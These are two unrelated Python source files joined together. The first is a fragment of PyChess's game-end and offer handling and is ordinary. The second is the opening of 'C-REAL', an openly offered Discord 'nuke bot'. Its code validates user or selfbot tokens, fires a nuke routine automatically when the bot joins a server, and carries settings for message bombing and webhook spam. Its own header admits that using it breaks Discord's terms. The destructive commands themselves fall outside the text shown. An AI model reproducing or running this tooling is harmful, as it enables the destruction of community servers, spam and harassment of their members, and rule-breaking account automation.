gmwidg.cids[gamemodel.connection] = gamemodel.connection.connect(
"disconnected", self.on_disconnected, gmwidg
)
def on_game_terminated(self, gamemodel, gmwidg):
for player in self.offer_cids[gamemodel]:
player.disconnect(self.offer_cids[gamemodel][player])
for cid in self.model_cids[gamemodel]:
gamemodel.disconnect(cid)
for cid in self.gmwidg_cids[gmwidg]:
gmwidg.disconnect(cid)
del self.offer_cids[gamemodel]
del self.gmwidg_cids[gmwidg]
del self.model_cids[gamemodel]
def on_disconnected(self, fics_connection, gamewidget):
def disable_buttons():
for button in gamewidget.game_ended_message.buttons:
button.set_property("sensitive", False)
button.set_property("tooltip-text", "")
if gamewidget.game_ended_message:
disable_buttons
# ===============================================================================
# Gamewidget signals
# ===============================================================================
def on_gmwidg_closed(self, gmwidg):
perspective = perspective_manager.get_perspective("games")
if len(perspective.key2gmwidg) == 1:
getWidgets()["main_window"].set_title("%s - PyChess" % _("Welcome"))
return False
def on_gmwidg_title_changed(self, gmwidg, new_title):
# log.debug("gamenanny.on_gmwidg_title_changed: starting %s" % repr(gmwidg))
if gmwidg.isInFront():
getWidgets()["main_window"].set_title("%s - PyChess" % new_title)
# log.debug("gamenanny.on_gmwidg_title_changed: returning")
return False
# ===============================================================================
# Gamemodel signals
# ===============================================================================
def game_ended(self, gamemodel, reason, gmwidg):
log.debug(
"gamenanny.game_ended: reason=%s gmwidg=%s\ngamemodel=%s"
% (reason, gmwidg, gamemodel)
)
nameDic = {
"white": gamemodel.players[WHITE],
"black": gamemodel.players[BLACK],
"mover": gamemodel.curplayer,
}
if gamemodel.status == WHITEWON:
nameDic["winner"] = gamemodel.players[WHITE]
nameDic["loser"] = gamemodel.players[BLACK]
elif gamemodel.status == BLACKWON:
nameDic["winner"] = gamemodel.players[BLACK]
nameDic["loser"] = gamemodel.players[WHITE]
msg_one = reprResult_long[gamemodel.status] % nameDic
msg_two = reprReason_long[reason] % nameDic
if gamemodel.reason == WON_ADJUDICATION:
color = BLACK if gamemodel.status == WHITEWON else WHITE
invalid_move = gamemodel.players[color].invalid_move
if invalid_move:
msg_two += _(" invalid engine move: %s" % invalid_move)
content = InfoBar.get_message_content(msg_one, msg_two, Gtk.STOCK_DIALOG_INFO)
message = InfoBarMessage(Gtk.MessageType.INFO, content, None)
callback = None
if isinstance(gamemodel, ICGameModel):
if gamemodel.hasLocalPlayer() and not gamemodel.examined:
def status_changed(player, prop, message):
make_sensitive_if_available(message.buttons[0], player)
make_sensitive_if_playing(message.buttons[1], player)
def callback(infobar, response, message, gamemodel=gamemodel):
if response == 0:
gamemodel.remote_player.offerRematch()
elif response == 1:
gamemodel.remote_player.observe()
return False
gmwidg.cids[
gamemodel.remote_ficsplayer
] = gamemodel.remote_ficsplayer.connect(
"notify::status", status_changed, message
)
message.add_button(InfoBarMessageButton(_("Offer Rematch"), 0))
message.add_button(
InfoBarMessageButton(
_("Observe %s" % gamemodel.remote_ficsplayer.name), 1
)
)
status_changed(gamemodel.remote_ficsplayer, None, message)
else:
def status_changed(player, prop, button):
make_sensitive_if_playing(button, player)
def callback(infobar, response, message, gamemodel=gamemodel):
if response in (0, 1):
gamemodel.players[response].observe()
return False
for i, player in enumerate(gamemodel.ficsplayers):
button = InfoBarMessageButton(_("Observe %s" % player.name), i)
message.add_button(button)
gmwidg.cids[player] = player.connect(
"notify::status", status_changed, button
)
status_changed(player, None, button)
elif gamemodel.hasLocalPlayer() and not isinstance(gamemodel, LearnModel):
def callback(infobar, response, message, gamemodel=gamemodel):
if response == 1:
# newGameDialog uses perspectives.games uses gamenanny uses newGameDialog...
from pychess.widgets.newGameDialog import createRematch
createRematch(gamemodel)
elif response == 2:
if gamemodel.ply > 1:
offer = Offer(TAKEBACK_OFFER, 2)
else:
offer = Offer(TAKEBACK_OFFER, 1)
if gamemodel.players[0].__type__ == LOCAL:
gamemodel.players[0].emit("offer", offer)
else:
gamemodel.players[1].emit("offer", offer)
return False
if not gamemodel.isLoadedGame():
message.add_button(InfoBarMessageButton(_("Play Rematch"), 1))
if (
gamemodel.status in UNDOABLE_STATES
and gamemodel.reason in UNDOABLE_REASONS
):
if gamemodel.ply == 1:
message.add_button(InfoBarMessageButton(_("Undo one move"), 2))
elif gamemodel.ply > 1:
message.add_button(InfoBarMessageButton(_("Undo two moves"), 2))
message.callback = callback
gmwidg.game_ended_message = message
perspective = perspective_manager.get_perspective("games")
if len(perspective.key2gmwidg) > 0:
gmwidg.replaceMessages(message)
if reason == WHITE_ENGINE_DIED:
self.engineDead(gamemodel.players[0], gmwidg)
elif reason == BLACK_ENGINE_DIED:
self.engineDead(gamemodel.players[1], gmwidg)
if (
(isinstance(gamemodel, ICGameModel) and not gamemodel.isObservationGame())
or gamemodel.isEngine2EngineGame()
or (isinstance(gamemodel, LearnModel) and not gamemodel.failed_playing_best)
):
create_task(gamemodel.restart_analyzer(HINT))
create_task(gamemodel.restart_analyzer(SPY))
if not conf.get("hint_mode"):
gamemodel.pause_analyzer(HINT)
if not conf.get("spy_mode"):
gamemodel.pause_analyzer(SPY)
return False
def on_game_started(self, gamemodel, gmwidg):
# offline lectures can reuse same gamemodel/gamewidget
# to show several examples inside the same lecture
if gamemodel.offline_lecture:
gmwidg.clearMessages()
# Rotate to human player
boardview = gmwidg.board.view
if gamemodel.players[1].__type__ == LOCAL:
if gamemodel.players[0].__type__ != LOCAL:
boardview.rotation = math.pi
if isinstance(gamemodel, LearnModel):
if gamemodel.orientation == BLACK:
boardview.rotation = math.pi
else:
boardview.rotation = 0
# Play set-up sound
preferencesDialog.SoundTab.playAction("gameIsSetup")
# Connect player offers to infobar
for player in gamemodel.players:
if player.__type__ == LOCAL:
self.offer_cids[gamemodel][player] = player.connect(
"offer", self.offer_callback, gamemodel, gmwidg
)
# Start analyzers if any
if not gamemodel.isEngine2EngineGame():
create_task(gamemodel.start_analyzer(HINT))
create_task(gamemodel.start_analyzer(SPY))
if not conf.get("hint_mode"):
gamemodel.pause_analyzer(HINT)
if not conf.get("spy_mode"):
gamemodel.pause_analyzer(SPY)
return False
# ===============================================================================
# Player signals
# ===============================================================================
def offer_callback(self, player, offer, gamemodel, gmwidg):
if gamemodel.status != RUNNING:
# If the offer has already been handled by Gamemodel and the game was
# drawn, we need to do nothing
return
message = ""
if offer.type == ABORT_OFFER:
message = _("You sent an abort offer")
elif offer.type == ADJOURN_OFFER:
message = _("You sent an adjournment offer")
elif offer.type == DRAW_OFFER:
message = _("You sent a draw offer")
elif offer.type == PAUSE_OFFER:
message = _("You sent a pause offer")
elif offer.type == RESUME_OFFER:
message = _("You sent a resume offer")
elif offer.type == TAKEBACK_OFFER:
message = _("You sent an undo offer")
elif offer.type == HURRY_ACTION:
message = _("You asked your opponent to move")
elif offer.type == FLAG_CALL:
message = _("You sent flag call")
else:
return
def response_cb(infobar, response, message):
message.dismiss()
return False
content = InfoBar.get_message_content("", message, Gtk.STOCK_DIALOG_INFO)
message = InfoBarMessage(Gtk.MessageType.INFO, content, response_cb)
gmwidg.replaceMessages(message)
return False
# ===============================================================================
# Subfunctions
# ===============================================================================
def engineDead(self, engine, gmwidg):
gmwidg.bringToFront()
dialog = Gtk.MessageDialog(
mainwindow(), type=Gtk.MessageType.ERROR, buttons=Gtk.ButtonsType.OK
)
dialog.set_markup(_("<big><b>Engine, %s, has died</b></big>") % repr(engine))
dialog.format_secondary_text(
_(
"PyChess has lost connection to the engine, probably because it has died.\n\n \
You can try to start a new game with the engine, or try to play against another one."
)
)
dialog.connect("response", lambda dialog, r: dialog.hide())
dialog.show_all()
game_nanny = GameNanny()
|
<gh_stars>0
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 - 2021
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Don't use the bot on real servers or use it to spam because this is breaking
discord's ToS, and you will be resulted in an account deletion.
"""
# discord
import discord, sys, requests, os, time
from discord.ext import commands
import asyncio
from packaging import version
from random import randint, choice, randrange, random, choices
from threading import Thread
from inputimeout import inputimeout, TimeoutOccurred
from queue import Queue
from io import BytesIO
from pathlib import Path
from math import ceil
from copy import deepcopy
if sys.platform == 'linux':
import simplejson as json
else:
import json
# style
from colorama import init, Fore
init(autoreset=True)
#
__TITLE__ = "C-REAL"
__VERSION__ = "2.4.0"
__AUTHOR__ = "TKperson"
__LICENSE__ = "MIT"
# Global vars
per_page = 15
commands_per_page = 5
number_of_bomb_default = 250
selected_server = None
sorted_commands = []
webhook_targets = []
saved_ctx = None
nuke_on_join = False
auto_nick = False
auto_status = False
selfbot_has_perm = False
timeout = 6
fetching_members = False
bad_filename_map = dict((ord(char), None) for char in '<>:"\\/|?*')
grant_all_permissions = False
# normal functions==============
def exit():
try:
input('Press enter to exit...')
except (EOFError, KeyboardInterrupt):
pass
sys.exit(1)
def banner():
"""Handler for non-unicode consoles"""
sys.stdout.buffer.write(f'''\
██████╗ ██████╗ ███████╗ █████╗ ██╗
██╔════╝ ██╔══██╗██╔════╝██╔══██╗██║ Version: {__VERSION__}
██║ █████╗ ██████╔╝█████╗ ███████║██║ Made by:
██║ ╚════╝ ██╔══██╗██╔══╝ ██╔══██║██║ TKperson
╚██████╗ ██║ ██║███████╗██║ ██║███████╗ and
╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ cyxl
'''.encode('utf8'))
# Check for > 1.5.1 discord version
if version.parse('1.5.1') > version.parse(discord.__version__):
print('Please update your discord.py.')
exit()
settings = {"token":None,"permissions":[],"bot_permission":"2146958847","command_prefix":".","bot_status":"offline","verbose":15,"bomb_messages":{"random":None,"fixed":[]},"webhook_spam":{"usernames":[],"pfp_urls":[],"contents":[]},"after":[],"proxies":[],"ban_whitelist":[]}
def setUp():
# check location
from glob import glob
config = None
config_parent_dir = os.path.join(Path().absolute().__str__(), 'data')
config_path = os.path.join(config_parent_dir, 'default.json')
json_paths = glob(os.path.join(Path().absolute().__str__(), 'data', '*.json'))
def getConfig(choice, timeout):
while True:
# it really doesn't matter if I use triple quotes or not.... the speed is going to be the same and doing this looks better
print('=========================')
print('| |')
print('| [{0}] Load default.json |'.format('1' if 1 in choice else 'x'))
print('| [{0}] Select .json file |'.format('2' if 2 in choice else 'x'))
print('| [{0}] Create a new json |'.format('3' if 3 in choice else 'x'))
print('| |')
print('=========================')
print('[x] = not Available;')
try:
response = inputimeout(prompt='Auto boot with choice [1] in %d seconds...\nChoose 1, 2, or 3\n>> ' % timeout, timeout=timeout)
except TimeoutOccurred:
response = '1'
if response == '1':
if not os.path.isfile(config_path):
print(f'Unable to find file: {config_path}')
continue
with open(config_path, 'r', encoding='utf8') as f:
try:
return json.loads(f.read())
except json.decoder.JSONDecodeError:
print(f'There are some errors occured when reading the configuration file. File path -> {config_path}\nI recommend you use https://jsonlint.com/?code= to help checking the configuration file. Skipping reading the default.json file...')
break
elif response == '2':
while True:
print('=========================')
print('0) Go back')
for i, path in enumerate(json_paths):
print(f'{str(i+1)}) {path}')
index = input('Select the .json file.\n>> ')
if not index.isdigit() or not (0 <= (index := int(index)) <= len(json_paths)):
print(f'You need to enter an integer that is between or on 0 and {str(len(json_paths))}')
continue
if index == 0:
timeout = 999999
break
with open(json_paths[index-1], 'r', encoding='utf8') as f:
try:
return json.loads(f.read())
except json.decoder.JSONDecodeError:
print(f'There are some errors occured when reading the configuration file. File path -> {config_path}\nI recommend you use https://jsonlint.com/?code= to help checking the configuration file. Skipping reading the default.json file...')
elif response == '3':
break
global settings, settings_copy
if os.path.isfile(config_path): # have default.json
config = getConfig([1,2,3], 5)
elif len(json_paths) > 0: # dont have default.json but have other .json file
config = getConfig([2,3], 999999)
if config is not None:
settings.update(config)
else:
try:
# from getpass import getpass
# settings['token'] = getpass('Enter token. Note: Whatever you entered here will not be displayed.\n>> ')
settings['token'] = input('Enter token. If you are new refer to this guide: https://github.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot/wiki/Basic-setup-and-knowledge-for-using-the-bot\n>> ')
settings['permissions'].append(input('\nEnter your discord tag or user ID. It is recommended to use discord user ID because some unicode names are hard for the code to check.\n>> '))
except KeyboardInterrupt:
sys.exit(0)
except EOFError:
print('Invalid input/EOFError. This may be caused by some unicode.')
exit()
print('\nTips:')
print('The default command_prefix is: .')
print(f'Your currect command_prefix is: {settings["command_prefix"]}')
print(f'Use {settings["command_prefix"]}config to config the settings and more info about how to config.\n')
print('Join our discord https://discord.gg/FwGWvwv4mW')
settings_copy = deepcopy(settings)
setUp()
# token, permissions, bomb_messages, webhook_spam, bot_permission, command_prefix, bot_status, verbose, after, proxies = readJson()
want_log_request = want_log_console = want_log_message = want_log_errors = 0
def updateVerbose():
global want_log_request, want_log_console, want_log_message, want_log_errors
verbose = settings['verbose']
want_log_request = verbose & 1 << 0
want_log_console = verbose & 1 << 1
want_log_message = verbose & 1 << 2
want_log_errors = verbose & 1 << 3
updateVerbose()
# def randomProxy(protocol):
# # As long it works fine then i'm using this method
# if proxies is None or len(proxies) == 0:
# return None
# return {protocol: choice(proxies)}
is_selfbot = True
headers = {}
def checkToken(token=None):
if token is None:
token = settings['token']
global is_selfbot, headers
try:
headers = {'authorization': token, 'content-type': 'application/json'}
print('Checking selfbot token.', end='\r')
if not 'id' in requests.get(url='https://discord.com/api/v8/users/@me', timeout=timeout, headers=headers).json():
# This is the hardest thing that I have tried to find in my life took me ages to know "Bot <token>" is actually the bot's authorization
# Reading source codes is always a good thing :)
headers['authorization'] = 'Bot ' + token
print('Checking normal bot token.', end='\r')
if not 'id' in requests.get(url='https://discord.com/api/v8/users/@me', timeout=timeout, headers=headers).json():
print('Invalid token is being used.')
exit()
else:
is_selfbot = False
# except requests.exceptions.ProxyError:
# print('Bad proxy is being used. You can try to change a proxy or restart the bot.')
# exit()
# except requests.exceptions.ConnectTimeout:
# print(f'Proxy reached maximum load time: timeout is {timeout} seconds long.')
# exit()
except requests.exceptions.ConnectionError:
print('You should probably consider connecting to the internet before using any discord related stuff. If you are connected to wifi and still seeing this message, then maybe try turn off your VPN/proxy/TOR node. If you are still seeing this message or you just don\'t what to turn off vpn, you can try to use websites like repl/heroku/google cloud to host the bot for you. The source code is on https://github.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot.')
exit()
except (requests.exceptions.InvalidHeader, json.decoder.JSONDecodeError):
print('Invalid token is being used.')
exit()
checkToken()
### check updates
print('Checking update... ', end='\r')
github_version = requests.get('https://raw.githubusercontent.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot/master/VERSION.txt').text
if version.parse(github_version) > version.parse(__VERSION__):
print(f'New C-REAL update has been launched -> {github_version} <- :party:')
print('Loading scripts...' + ' ' * 15, end='\r')
"""
command_prefix - command prefix
case_insensitive - commands will be callable without case retrictions if this is set to true
self_bot - self_bot: :class:`bool`
If ``True``, the bot will only listen to commands invoked by itself rather
than ignoring itself. If ``False`` (the default) then the bot will ignore
itself. This cannot be changed once initialised.
intents - intents: :class:`Intents`
The intents that you want to enable for the session. This is a way of
disabling and enabling certain gateway events from triggering and being sent.
If not given, defaults to a regularly constructed :class:`Intents` class.
"""
async def determine_prefix(bot, message): # https://stackoverflow.com/questions/56796991/discord-py-changing-prefix-with-command
return settings['command_prefix']
# client = commands.Bot(command_prefix=determine_prefix, case_insensitive=True, self_bot=is_selfbot, proxies=randomProxy('http'))
client = commands.Bot(command_prefix=settings['command_prefix'], case_insensitive=True, self_bot=is_selfbot, intents=discord.Intents().all())
client.remove_command('help')
######### Events #########
@client.event
async def on_connect():
if is_selfbot:
for user in settings['permissions']:
if str(client.user.id) == user or f'{client.user.name}#{client.user.discriminator}' == user:
global selfbot_has_perm
selfbot_has_perm = True
settings['permissions'].append(str(client.user.id))
global sorted_commands
sorted_commands = sorted(client.commands, key=lambda e: e.name[0])
await changeStatus(None, settings['bot_status'])
@client.event
async def on_ready():
banner()
print('/+========================================================')
print(f'| | {Fore.GREEN}Bot ready.')
print(f'| {Fore.MAGENTA}+ Logged in as')
print(f'| | {client.user.name}#{client.user.discriminator}')
print(f'| | {client.user.id}')
print(f'| {Fore.MAGENTA}+ Permission given to ')
for permission in settings['permissions']:
print(f'| | {permission}')
print(f'| {Fore.MAGENTA}+ Command prefix: ' + settings['command_prefix'])
if is_selfbot:
print(f'| {Fore.YELLOW}+ [Selfbot] This is a selfbot. Join servers with join codes.')
else:
print(f'| {Fore.YELLOW}+ https://discord.com/api/oauth2/authorize?client_id={client.user.id}&permissions={settings["bot_permission"]}&scope=bot')
print('| ~*************************************')
print('\\+-----')
@client.event
async def on_disconnect():
'''
on_disconnect - when the script is disconnected with the profile the bot will run this command
usage: reset status
'''
await changeStatus(None, 'offline')
### logs ###
async def log(ctx, message):
"""
Logging messages to the user
no args, but has settings.
Modes:
- Discord side
- coming soon
"""
if want_log_message:
# if not isDM(ctx) and ctx.guild.id == selected_server.id and 1 << 11 & selected_server.me.guild_permissions.value == 0:
# consoleLog(message, True)
# else:
try:
await ctx.send(message)
except discord.errors.HTTPException:
for i in range(ceil(len(message) / 2000)):
await log(ctx, message[2000 * i:2000 * (i + 1)])
except:
consoleLog(message)
def consoleLog(message, print_time=False):
if want_log_console:
TIME = ''
if print_time:
TIME = f'{Fore.MAGENTA}[{time.strftime("%H:%M:%S", time.localtime())}] {Fore.RESET}'
try:
print(f'{TIME}{message}')
except TypeError: # when there's a character that can't be logged with python print function.
sys.stdout.buffer.write(f'{TIME}{message}'.encode('utf8'))
@client.event
async def on_command_error(ctx, error):
# source: https://gist.github.com/AileenLumina/510438b241c16a2960e9b0b014d9ed06
# source: https://github.com/Rapptz/discord.py/blob/master/discord/errors.py
"""
Error handlers
It's always a good idea to look into the source code to find things that are hard to find on the internet.
"""
# Debug mode
# raise error
if not want_log_errors or hasattr(ctx.command, 'on_error'):
return
# get the original exception
error = getattr(error, 'original', error)
# print(error)
# print(str(type(error)))
if isinstance(error, commands.CommandNotFound):
if checkPerm(ctx):
try:
await log(ctx, f'Command `{ctx.message.content}` is not found.')
except discord.errors.HTTPException:
await log(ctx, 'That command is not found.')
elif isinstance(error, commands.CheckFailure):
pass
elif isinstance(error, discord.Forbidden):
await log(ctx, f'403 Forbidden: Missing permission.')
elif isinstance(error, discord.errors.HTTPException): # usually caused by sending over 2000 characters limit
# has already been handled in "def log"
pass
elif isinstance(error, commands.UserInputError):
await log(ctx, 'Invalid input.')
else:
# 'args', 'code', 'response', 'status', 'text', 'with_traceback'
# print(error)
# print(error.args)
# print(type(error.args))
try: # Don't want too many things logged into discord
await log(ctx, '%s' % error.args)
except discord.errors.NotFound: # When ctx.channel is deleted
pass
except TypeError: # When there's a charater that can't be logged into discord. Like if error.args contains a tuple which can't be automatically turned into a string.
consoleLog(f'{Fore.RED}Error -> {error.args}: {Fore.YELLOW}When using "{ctx.message.content}".', True)
if is_selfbot:
@client.event
async def on_message(message):
if message.content.startswith(settings["command_prefix"]) and checkPerm(await client.get_context(message)):
if message.author.id == client.user.id and not selfbot_has_perm:
consoleLog(f'{Fore.YELLOW}Account owner {Fore.LIGHTBLUE_EX}"{client.user.name}#{client.user.discriminator}" {Fore.YELLOW}tried to use {Fore.LIGHTBLUE_EX}"{message.content}"{Fore.BLUE}. Too bad, he/she doesn\'t of the power to use this bot.', True)
return
message.author = client.user
await client.process_commands(message)
@client.event
async def on_guild_join(guild):
if nuke_on_join:
global selected_server
selected_server = guild
await nuke(saved_ctx)
def isDM(ctx):
"""
No args
Checking if the ctx is whether from DM or in a server. There are different handlers for handling some commands.
"""
return isinstance(ctx.channel, discord.channel.DMChannel)
# if isinstance(ctx.channel, discord.channel.DMChannel):
# return True # in dm
# return False # in server
def nameIdHandler(name):
"""
<@! ID > = pinging user
<@& ID > = pinging role
Usage - remove the brakets around the ID
return - the ID
"""
if name.startswith('<@!') or name.startswith('<@&'):
return name[:-1][3:]
return name
async def embed(ctx, n, title, array):
"""
Parameters:
n - page number. And default is 1
title - Command name/title
array - The list for handling
"""
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
names = ''
ids = ''
item_length = len(array)
if item_length == 0:
return await ctx.send(f'{title} count: 0')
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item = array[i]
if len(item.name) > 17:
item.name = item.name[:17] + '...'
names += f'{item.name}\n'
ids += f'{str(item.id)}\n '
# if not isDM(ctx) and 1 << 11 & selected_server.me.guild_permissions.value == 0 and (selected_server is None or ctx.guild.id == selected_server.id):
# names = names.split('\n')
# ids = ids.split(' ')
# consoleLog(f'\n{Fore.GREEN}*{title}*\n{Fore.RESET}Total count: {Fore.YELLOW}{str(item_length)}\n{Fore.GREEN}__Name__{" " * 13}{Fore.CYAN}__ID__\n{ "".join([(Fore.GREEN + names[i].ljust(21) + Fore.CYAN + ids[i]) for i in range(len(names) - 1)]) }{Fore.YELLOW}{n+1}/{str(ceil(item_length / per_page))}', True)
# else:
try:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = title,
description = f'Total count: {str(item_length)}; color: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Name', value=names, inline=True)
embed.add_field(name='ID', value=ids, inline=True)
embed.set_footer(text=f'{n+1}/{str(ceil(item_length / per_page))}')
await ctx.send(embed=embed)
except:
names = names.split('\n')
ids = ids.split(' ')
await ctx.send(f'```*{title}*\nTotal count: {str(item_length)}\n__Name__{" " * 13}__ID__\n{ "".join([(names[i].ljust(21) + ids[i]) for i in range(len(names) - 1)]) }{n+1}/{str(ceil(item_length / per_page))}```')
async def hasTarget(ctx):
"""
Checking if there's a selected server for using the comands.
"""
if selected_server is not None:
return True
elif not isDM(ctx):
await connect(ctx)
await log(ctx, f'You have been automatically `{settings["command_prefix"]}connect` to server `{selected_server.name}` because you are not connected to a server and using a command inside a server.')
return True
else:
await log(ctx, f'I am not connected to a server. Try `{settings["command_prefix"]}servers` and `{settings["command_prefix"]}connect`')
return False
def containing(a, b):
for c in a:
if c.name.lower() == b.lower() or str(c.id) == b:
return c
return None
def checkPerm(ctx):
if grant_all_permissions:
return True
for user in settings['permissions']:
if str(ctx.author.id) == user or f'{ctx.author.name}#{ctx.author.discriminator}' == user:
return True
if not isDM(ctx):
consoleLog(f'{Fore.LIGHTRED_EX}{ctx.author.name}#{ctx.author.discriminator} {Fore.RESET}tried to use {Fore.LIGHTYELLOW_EX}"{ctx.message.content}" {Fore.RESET}in server {Fore.LIGHTYELLOW_EX}"{ctx.guild.name}"{Fore.RESET}, at channel {Fore.LIGHTYELLOW_EX}"{ctx.channel.name}"{Fore.RESET}.', True)
else:
consoleLog(f'{Fore.LIGHTRED_EX}{ctx.author.name}#{ctx.author.discriminator} {Fore.RESET}tried to use {Fore.LIGHTYELLOW_EX}"{ctx.message.content}" {Fore.RESET}in {Fore.LIGHTYELLOW_EX}the bot\'s direct message{Fore.RESET}.', True)
return False
def fixedChoice():
return settings['bomb_messages']['fixed'][randint(0, len(settings['bomb_messages']['fixed']) - 1)]
base64_char = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/'
def random_b64(n=0):
return ''.join(choices(base64_char, k=settings['bomb_messages']['random'] if n == 0 else n))
alphanum = '0123456789!@#$%^&*ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
def random_an():
return ''.join(choices(alphanum, k=settings['bomb_messages']['random']))
def sendMessagePerm(ctx):
pass
def checkTalkPerm(ctx):
if isDM(ctx): # you can always talk in dm
return True
# return calcPerm(ctx, ) and 16384 & ctx.channel.
def configIsSaved():
# global settings_copy, settings # idk why python did this but after adding this for my 3.8.5 python it works
return settings_copy == settings
# class discordMember:
# def __init__(self, name, id_, discriminator=None, channel_id=None):
# self.name = name
# self.id = id_
# self.discriminator = discriminator
# self.channel_id = channel_id
# server_members = []
# def copyMember(author):
# server_members.append(discordMember(author['username'], author['id'], author['discriminator']))
# def autoFindChannel():
# for channel in selected_server.text_channels:
# for name in ['join', 'welcome', 'incoming']:
# if name in channel.name:
# return channel.id
# return None
######### Commands ##########
######### Listing ##########
@commands.check(checkPerm)
@client.command(name='help', aliases=['h', 'commands'])
async def help(ctx, asked_command=None):
help_list = '```'
if asked_command is None:
for command in sorted_commands:
help_list += f'[{command.name}] '
await ctx.send(help_list + f'\n\nYou can try {settings["command_prefix"]}help <command> to see all the aliases for the command. Or read the manual.md for more infomation about the commands.```')
else:
for command in sorted_commands:
if asked_command.lower() == command.name.lower():
help_command = f'```{settings["command_prefix"]}<{command.name}'
for aliase in command.aliases:
help_command += f'|{aliase}'
help_command += '>'
for param, default in command.params.items():
if param == 'ctx':
continue
if default.empty is not default.default:
help_command += ' {' + param + '=' + str(default.default) + '}'
else:
help_command += ' [' + param + ']'
if default.kind.name == 'KEYWORD_ONLY':
break
help_command += '```'
await ctx.send(help_command)
return
await log(ctx, f'Unable to find command `{asked_command}`.')
@commands.check(checkPerm)
@client.command(name='servers', aliases=['se', 'server'])
async def servers(ctx, n='1'):
await embed(ctx, n, 'Servers', client.guilds)
@commands.check(checkPerm)
@client.command(name='channels', aliases=['tc', 'textchannels', 'textchannel', 'channel'])
async def channels(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Text channels', selected_server.text_channels)
@commands.check(checkPerm)
@client.command(name='roles', aliases=['ro', 'role'])
async def roles(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Roles', selected_server.roles)
@commands.check(checkPerm)
@client.command(name='categories', aliases=['cat', 'category'])
async def categories(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Categories', selected_server.categories)
@commands.check(checkPerm)
@client.command(name='voiceChannels', aliases=['vc', 'voicechannel'])
async def voiceChannels(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Voice channels', selected_server.voice_channels)
@commands.check(checkPerm)
@client.command(name='emojis', alises=['em', 'emoji'])
async def emojis(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Emojis', selected_server.emojis)
@commands.check(checkPerm)
@client.command(name='members', alises=['me', 'member'])
async def members(ctx, command='1', *, args=None):
if not await hasTarget(ctx):
return
print(len(selected_server.members))
await embed(ctx, command, 'Members', selected_server.members)
# global server_members
# if command.isdigit():
# if is_selfbot:
# await embed(ctx, command, 'Members', server_members)
# else:
# await embed(ctx, command, 'Members', selected_server.members)
# else:
# # def gFetchableChannel(channel_id): # check if the channel is good for fectching channel
# # pass
# if command == 'fetch':
# global fetching_members
# args = args.split()
# if not is_selfbot:
# await log(ctx, f'Fetch command is only made for selfbot; since you are using normal bots, all members in the server `{selected_server.name}` has already be fetched. Try `{settings["command_prefix"]}members` to see all the fetched members.')
# return
# if args[0].lower() == 'auto':
# channel_id = autoFindChannel()
# if channel_id is None:
# await log(ctx, f'Unable to find welcome channels. You have to enter the welcome channel\'s in server `{selected_server.name}` manually.')
# return
# elif args[0].lower() == 'stop':
# fetching_members = False
# await log(ctx, 'Fetching stopped.')
# return
# elif args[0].isdigit():
# channel_id = args[0]
# else:
# await log(ctx, 'Invalid argument: You can only enter `fetch auto` or `fetch <channel_id>`.')
# return
# # Making sure channel_id is a string
# channel_id = str(channel_id)
# if len(args) < 3:
# cooldown = 0
# elif args[2].isdigit():
# cooldown = int(args[2])
# else:
# await log(ctx, 'Please set a positive integer for the cooldown time of fetching every 100 messages. Use `0` if you don\'t want a cooldown.')
# return
# if args[1].lower() == 'fast':
# fetching_members = True
# url = f'https://discord.com/api/v8/channels/{channel_id}/messages?limit=100'
# await log(ctx, f'```Fetching has started.\nCheck progress: `{settings["command_prefix"]}members`\nStop fetching: `{settings["command_prefix"]}members fetch stop`.\nCooldown: `{cooldown}` seconds.\nNote: duplicated users will only get removed after the fetching stops.```')
# while fetching_members:
# r = requests.get(url, headers=headers, proxies=randomProxy('https'), timeout=timeout).json()
# if len(r) == 0:
# break
# for message in r:
# if message['mentions']: # len(message['content']) > 0 and
# for mention in message['mentions']:
# copyMember(mention)
# elif len(message['attachments']) > 0:
# pass # no handler for images
# elif len(message['embeds']) > 0:
# pass # no handlers for embeds mentions
# else:
# copyMember(message['author'])
# url = f'https://discord.com/api/v8/channels/{channel_id}/messages?before={r[-1]["id"]}&limit=100'
# if cooldown > 0:
# await asyncio.sleep(cooldown)
# elif args[1].lower() == 'all':
# await log(ctx, f'```Fetching has started.\nCheck progress: `{settings["command_prefix"]}members`\nStop fetching: `{settings["command_prefix"]}members fetch stop`.\nCooldown: `{cooldown}` seconds.\nNote: duplicated users will only get removed after the fetching stops.```')
# pass
# else:
# await log(ctx, 'You need to choose a fetching operation. Options are `all` or `fast`.')
# # Removing duplicates
